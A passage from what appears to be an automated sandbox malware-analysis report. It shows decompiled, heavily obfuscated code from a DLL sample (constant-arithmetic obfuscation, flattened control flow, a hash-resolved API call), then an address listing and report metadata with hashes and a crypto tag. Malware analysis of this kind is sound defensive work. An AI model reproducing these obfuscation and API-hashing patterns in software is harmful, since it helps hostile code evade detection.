				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0x2ae1808);
								_v292 = _t770;
								_t708 = E02AF4244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E02AFE1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E02AFFECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E02AEC5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E02AFCCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E02AEE404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								E02B02B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E02AEC5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E02AFCCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E02AEE404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
							E02AFC9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E02AFCCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E02AFCCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E02AEE404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E02AFE1F8(0x2ae17a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E02B031AA(0xb00b1257, 0x44)))();
							E02AFFECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0x2ae1778);
						_t750 = E02AE3325( &_v256, E02AF4244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E02AFFECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}
























































































































                                                                                                          0x02af2e5d
                                                                                                          0x02af2e5d
                                                                                                          0x02af2e67
                                                                                                          0x02af2e6e
                                                                                                          0x02af2e72
                                                                                                          0x02af2e7d
                                                                                                          0x02af2e8d
                                                                                                          0x02af2e94
                                                                                                          0x02af2e99
                                                                                                          0x02af2ea4
                                                                                                          0x02af2eb4
                                                                                                          0x02af2eb9
                                                                                                          0x02af2ebf
                                                                                                          0x02af2ec7
                                                                                                          0x02af2ecc
                                                                                                          0x02af2ed4
                                                                                                          0x02af2edc
                                                                                                          0x02af2ee4
                                                                                                          0x02af2eec
                                                                                                          0x02af2ef4
                                                                                                          0x02af2efc
                                                                                                          0x02af2f04
                                                                                                          0x02af2f11
                                                                                                          0x02af2f14
                                                                                                          0x02af2f18
                                                                                                          0x02af2f20
                                                                                                          0x02af2f28
                                                                                                          0x02af2f30
                                                                                                          0x02af2f40
                                                                                                          0x02af2f44
                                                                                                          0x02af2f4c
                                                                                                          0x02af2f54
                                                                                                          0x02af2f5f
                                                                                                          0x02af2f72
                                                                                                          0x02af2f73
                                                                                                          0x02af2f7a
                                                                                                          0x02af2f85
                                                                                                          0x02af2f8d
                                                                                                          0x02af2f92
                                                                                                          0x02af2f97
                                                                                                          0x02af2f9f
                                                                                                          0x02af2fa7
                                                                                                          0x02af2fb2
                                                                                                          0x02af2fba
                                                                                                          0x02af2fc5
                                                                                                          0x02af2fd9
                                                                                                          0x02af2fe0
                                                                                                          0x02af2feb
                                                                                                          0x02af2ff6
                                                                                                          0x02af2ffe
                                                                                                          0x02af3003
                                                                                                          0x02af300b
                                                                                                          0x02af3013
                                                                                                          0x02af301b
                                                                                                          0x02af3028
                                                                                                          0x02af302c
                                                                                                          0x02af3034
                                                                                                          0x02af303c
                                                                                                          0x02af3047
                                                                                                          0x02af3052
                                                                                                          0x02af305d
                                                                                                          0x02af3068
                                                                                                          0x02af3070
                                                                                                          0x02af3080
                                                                                                          0x02af3085
                                                                                                          0x02af308b
                                                                                                          0x02af3090
                                                                                                          0x02af3098
                                                                                                          0x02af30a0
                                                                                                          0x02af30ad
                                                                                                          0x02af30ae
                                                                                                          0x02af30b2
                                                                                                          0x02af30ba
                                                                                                          0x02af30c2
                                                                                                          0x02af30cd
                                                                                                          0x02af30d5
                                                                                                          0x02af30e0
                                                                                                          0x02af30eb
                                                                                                          0x02af30f6
                                                                                                          0x02af3101
                                                                                                          0x02af310c
                                                                                                          0x02af3117
                                                                                                          0x02af3122
                                                                                                          0x02af312a
                                                                                                          0x02af3135
                                                                                                          0x02af3140
                                                                                                          0x02af3153
                                                                                                          0x02af315a
                                                                                                          0x02af3165
                                                                                                          0x02af3172
                                                                                                          0x02af3176
                                                                                                          0x02af317e
                                                                                                          0x02af3186
                                                                                                          0x02af318e
                                                                                                          0x02af319b
                                                                                                          0x02af319f
                                                                                                          0x02af31a7
                                                                                                          0x02af31af
                                                                                                          0x02af31b7
                                                                                                          0x02af31c2
                                                                                                          0x02af31cd
                                                                                                          0x02af31d8
                                                                                                          0x02af31eb
                                                                                                          0x02af31f2
                                                                                                          0x02af31fa
                                                                                                          0x02af3205
                                                                                                          0x02af3210
                                                                                                          0x02af321b
                                                                                                          0x02af3226
                                                                                                          0x02af3231
                                                                                                          0x02af323c
                                                                                                          0x02af3247
                                                                                                          0x02af3252
                                                                                                          0x02af325d
                                                                                                          0x02af3265
                                                                                                          0x02af326f
                                                                                                          0x02af3273
                                                                                                          0x02af327b
                                                                                                          0x02af3283
                                                                                                          0x02af3297
                                                                                                          0x02af329e
                                                                                                          0x02af32a9
                                                                                                          0x02af32b4
                                                                                                          0x02af32bc
                                                                                                          0x02af32c4
                                                                                                          0x02af32c9
                                                                                                          0x02af32ce
                                                                                                          0x02af32d6
                                                                                                          0x02af32e1
                                                                                                          0x02af32e9
                                                                                                          0x02af32f4
                                                                                                          0x02af32fe
                                                                                                          0x02af3303
                                                                                                          0x02af3311
                                                                                                          0x02af3316
                                                                                                          0x02af331c
                                                                                                          0x02af3324
                                                                                                          0x02af332f
                                                                                                          0x02af333f
                                                                                                          0x02af3342
                                                                                                          0x02af3349
                                                                                                          0x02af3354
                                                                                                          0x02af335c
                                                                                                          0x02af3369
                                                                                                          0x02af336d
                                                                                                          0x02af3375
                                                                                                          0x02af3380
                                                                                                          0x02af338b
                                                                                                          0x02af3396
                                                                                                          0x02af339e
                                                                                                          0x02af33a3
                                                                                                          0x02af33ab
                                                                                                          0x02af33b3
                                                                                                          0x02af33bb
                                                                                                          0x02af33c3
                                                                                                          0x02af33cb
                                                                                                          0x02af33d3
                                                                                                          0x02af33db
                                                                                                          0x02af33e3
                                                                                                          0x02af33f6
                                                                                                          0x02af33f9
                                                                                                          0x02af3400
                                                                                                          0x02af340b
                                                                                                          0x02af3416
                                                                                                          0x02af3421
                                                                                                          0x02af342c
                                                                                                          0x02af3437
                                                                                                          0x02af3442
                                                                                                          0x02af344d
                                                                                                          0x02af3458
                                                                                                          0x02af346e
                                                                                                          0x02af3475
                                                                                                          0x02af347d
                                                                                                          0x02af3488
                                                                                                          0x02af3490
                                                                                                          0x02af349c
                                                                                                          0x02af349f
                                                                                                          0x02af34a3
                                                                                                          0x02af34a8
                                                                                                          0x02af34b0
                                                                                                          0x02af34bb
                                                                                                          0x02af34c6
                                                                                                          0x02af34d1
                                                                                                          0x02af34dc
                                                                                                          0x02af34e4
                                                                                                          0x02af34ef
                                                                                                          0x02af34fa
                                                                                                          0x02af3505
                                                                                                          0x02af3510
                                                                                                          0x02af351b
                                                                                                          0x02af3526
                                                                                                          0x02af3539
                                                                                                          0x02af3540
                                                                                                          0x02af354d
                                                                                                          0x02af3555
                                                                                                          0x02af355d
                                                                                                          0x02af3565
                                                                                                          0x02af356a
                                                                                                          0x02af3572
                                                                                                          0x02af357d
                                                                                                          0x02af3588
                                                                                                          0x02af3593
                                                                                                          0x02af359e
                                                                                                          0x02af35a6
                                                                                                          0x02af35b1
                                                                                                          0x02af35c5
                                                                                                          0x02af35ca
                                                                                                          0x02af35d3
                                                                                                          0x02af35de
                                                                                                          0x02af35ea
                                                                                                          0x02af35ef
                                                                                                          0x02af35f5
                                                                                                          0x02af35fd
                                                                                                          0x02af3602
                                                                                                          0x02af360a
                                                                                                          0x02af3615
                                                                                                          0x02af3620
                                                                                                          0x02af362b
                                                                                                          0x02af363e
                                                                                                          0x02af3641
                                                                                                          0x02af3653
                                                                                                          0x02af365a
                                                                                                          0x02af3665
                                                                                                          0x02af3670
                                                                                                          0x02af3678
                                                                                                          0x02af3683
                                                                                                          0x02af368e
                                                                                                          0x02af3696
                                                                                                          0x02af369e
                                                                                                          0x02af36a9
                                                                                                          0x02af36b4
                                                                                                          0x02af36bf
                                                                                                          0x02af36ca
                                                                                                          0x02af36d7
                                                                                                          0x02af36da
                                                                                                          0x02af36de
                                                                                                          0x02af36e3
                                                                                                          0x02af36eb
                                                                                                          0x02af36f3
                                                                                                          0x02af3703
                                                                                                          0x02af3707
                                                                                                          0x02af370f
                                                                                                          0x02af3717
                                                                                                          0x02af371f
                                                                                                          0x02af3727
                                                                                                          0x02af372f
                                                                                                          0x02af3737
                                                                                                          0x02af373c
                                                                                                          0x02af3744
                                                                                                          0x02af3756
                                                                                                          0x02af3759
                                                                                                          0x02af3760
                                                                                                          0x02af376d
                                                                                                          0x02af3775
                                                                                                          0x02af3784
                                                                                                          0x02af3787
                                                                                                          0x02af378e
                                                                                                          0x02af3792
                                                                                                          0x02af379a
                                                                                                          0x02af37a2
                                                                                                          0x02af37b2
                                                                                                          0x02af37ba
                                                                                                          0x02af37bf
                                                                                                          0x02af37c6
                                                                                                          0x02af37ca
                                                                                                          0x02af37d2
                                                                                                          0x02af37da
                                                                                                          0x02af37ee
                                                                                                          0x02af37f5
                                                                                                          0x02af37fc
                                                                                                          0x02af3807
                                                                                                          0x02af381a
                                                                                                          0x02af3821
                                                                                                          0x02af3829
                                                                                                          0x02af3834
                                                                                                          0x02af383f
                                                                                                          0x02af3852
                                                                                                          0x02af3859
                                                                                                          0x02af3864
                                                                                                          0x02af386f
                                                                                                          0x02af387a
                                                                                                          0x02af3885
                                                                                                          0x02af3890
                                                                                                          0x02af3898
                                                                                                          0x02af38a3
                                                                                                          0x02af38ae
                                                                                                          0x02af38b9
                                                                                                          0x02af38c1
                                                                                                          0x02af38cc
                                                                                                          0x02af38d7
                                                                                                          0x02af38e2
                                                                                                          0x02af38ed
                                                                                                          0x02af38f5
                                                                                                          0x02af38fd
                                                                                                          0x02af390a
                                                                                                          0x02af390e
                                                                                                          0x02af3916
                                                                                                          0x02af3921
                                                                                                          0x02af392c
                                                                                                          0x02af3934
                                                                                                          0x02af393f
                                                                                                          0x02af393f
                                                                                                          0x02af393f
                                                                                                          0x02af3944
                                                                                                          0x02af3944
                                                                                                          0x02af3944
                                                                                                          0x02af3944
                                                                                                          0x02af394a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af3be6
                                                                                                          0x02af3be8
                                                                                                          0x02af3ca8
                                                                                                          0x02af3caf
                                                                                                          0x02af3cb2
                                                                                                          0x02af3cc7
                                                                                                          0x02af3ccc
                                                                                                          0x02af3cd3
                                                                                                          0x02af3cda
                                                                                                          0x02af3d26
                                                                                                          0x02af3d34
                                                                                                          0x02af3d39
                                                                                                          0x02af3d40
                                                                                                          0x02af3d43
                                                                                                          0x02af3d48
                                                                                                          0x00000000
                                                                                                          0x02af3d48
                                                                                                          0x02af3bee
                                                                                                          0x02af3bf4
                                                                                                          0x02af3c6d
                                                                                                          0x02af3c84
                                                                                                          0x02af3c85
                                                                                                          0x02af3c87
                                                                                                          0x02af3c8c
                                                                                                          0x02af3c8f
                                                                                                          0x02af3c96
                                                                                                          0x02af3c98
                                                                                                          0x02af3a22
                                                                                                          0x02af3a22
                                                                                                          0x02af3c9e
                                                                                                          0x02af3a8d
                                                                                                          0x02af3a8d
                                                                                                          0x02af393f
                                                                                                          0x02af393f
                                                                                                          0x02af393f
                                                                                                          0x00000000
                                                                                                          0x02af393f
                                                                                                          0x02af393f
                                                                                                          0x02af3bf6
                                                                                                          0x02af3bfc
                                                                                                          0x02af3c36
                                                                                                          0x02af3c37
                                                                                                          0x02af3c41
                                                                                                          0x02af3c4a
                                                                                                          0x02af3c4b
                                                                                                          0x02af3c4c
                                                                                                          0x02af3c59
                                                                                                          0x02af3c5a
                                                                                                          0x02af3c5f
                                                                                                          0x02af3a8a
                                                                                                          0x02af3a8a
                                                                                                          0x00000000
                                                                                                          0x02af3a8a
                                                                                                          0x02af3bfe
                                                                                                          0x02af3c04
                                                                                                          0x02af3d77
                                                                                                          0x00000000
                                                                                                          0x02af3d7e
                                                                                                          0x02af3c0a
                                                                                                          0x02af3c10
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af3c16
                                                                                                          0x02af3c16
                                                                                                          0x02af3950
                                                                                                          0x02af3bb0
                                                                                                          0x02af3bc1
                                                                                                          0x02af3bc2
                                                                                                          0x02af3bc4
                                                                                                          0x02af3bc9
                                                                                                          0x02af3bcd
                                                                                                          0x02af3bcf
                                                                                                          0x02af3bd7
                                                                                                          0x02af3bd9
                                                                                                          0x02af3bde
                                                                                                          0x00000000
                                                                                                          0x02af3bde
                                                                                                          0x02af395c
                                                                                                          0x02af3b72
                                                                                                          0x02af3b73
                                                                                                          0x02af3b7d
                                                                                                          0x02af3b86
                                                                                                          0x02af3b87
                                                                                                          0x02af3b88
                                                                                                          0x02af3b95
                                                                                                          0x02af3b96
                                                                                                          0x02af3b9b
                                                                                                          0x00000000
                                                                                                          0x02af3b9b
                                                                                                          0x02af3968
                                                                                                          0x02af3b46
                                                                                                          0x02af3b4b
                                                                                                          0x02af3b52
                                                                                                          0x02af3b55
                                                                                                          0x02af3b5a
                                                                                                          0x00000000
                                                                                                          0x02af3b5a
                                                                                                          0x02af3974
                                                                                                          0x02af3a9d
                                                                                                          0x02af3ab6
                                                                                                          0x02af3ab7
                                                                                                          0x02af3ac1
                                                                                                          0x02af3ac3
                                                                                                          0x02af3ac6
                                                                                                          0x02af3acd
                                                                                                          0x02af3acf
                                                                                                          0x02af3ad1
                                                                                                          0x02af3ad3
                                                                                                          0x02af3adc
                                                                                                          0x02af3adc
                                                                                                          0x02af3ade
                                                                                                          0x02af3ae0
                                                                                                          0x02af3ae2
                                                                                                          0x02af3ae5
                                                                                                          0x02af3ae5
                                                                                                          0x02af3ae5
                                                                                                          0x02af3ae5
                                                                                                          0x02af3afe
                                                                                                          0x02af3aff
                                                                                                          0x02af3b04
                                                                                                          0x02af3b09
                                                                                                          0x02af3b0a
                                                                                                          0x02af3b0c
                                                                                                          0x02af3b0d
                                                                                                          0x02af3b1d
                                                                                                          0x02af3b1e
                                                                                                          0x02af3b23
                                                                                                          0x00000000
                                                                                                          0x02af3b23
                                                                                                          0x02af3980
                                                                                                          0x02af3a23
                                                                                                          0x02af3a2c
                                                                                                          0x02af3a33
                                                                                                          0x02af3a3e
                                                                                                          0x02af3a43
                                                                                                          0x02af3a54
                                                                                                          0x02af3a55
                                                                                                          0x02af3a56
                                                                                                          0x02af3a57
                                                                                                          0x02af3a66
                                                                                                          0x02af3a80
                                                                                                          0x02af3a85
                                                                                                          0x00000000
                                                                                                          0x02af3a85
                                                                                                          0x02af3986
                                                                                                          0x02af398c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af3992
                                                                                                          0x02af3996
                                                                                                          0x02af39a5
                                                                                                          0x02af39d6
                                                                                                          0x02af39fb
                                                                                                          0x02af3a00
                                                                                                          0x02af3a0c
                                                                                                          0x02af3a0e
                                                                                                          0x02af3a11
                                                                                                          0x00000000
                                                                                                          0x02af3d4d
                                                                                                          0x02af3d4d
                                                                                                          0x02af3d4d
                                                                                                          0x00000000
                                                                                                          0x02af3d59

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
                                                                                                          • API String ID: 0-3070105227
                                                                                                          • Opcode ID: 63e09184ecc32ab472bfddf19b0b53897171abb2ed3facfb985275ca5e76f0b0
                                                                                                          • Instruction ID: 0a61e9d783b5cc435a2c076f7c1bb8d1b22efb762c5a199f1e1497258587a89a
                                                                                                          • Opcode Fuzzy Hash: 63e09184ecc32ab472bfddf19b0b53897171abb2ed3facfb985275ca5e76f0b0
                                                                                                          • Instruction Fuzzy Hash: E27200715083819BD3B8CF25C58AB9BFBE1BBC4714F10891DE6DA86260DBB49949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE3431, Relevance: 17.0, Strings: 13, Instructions: 746COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
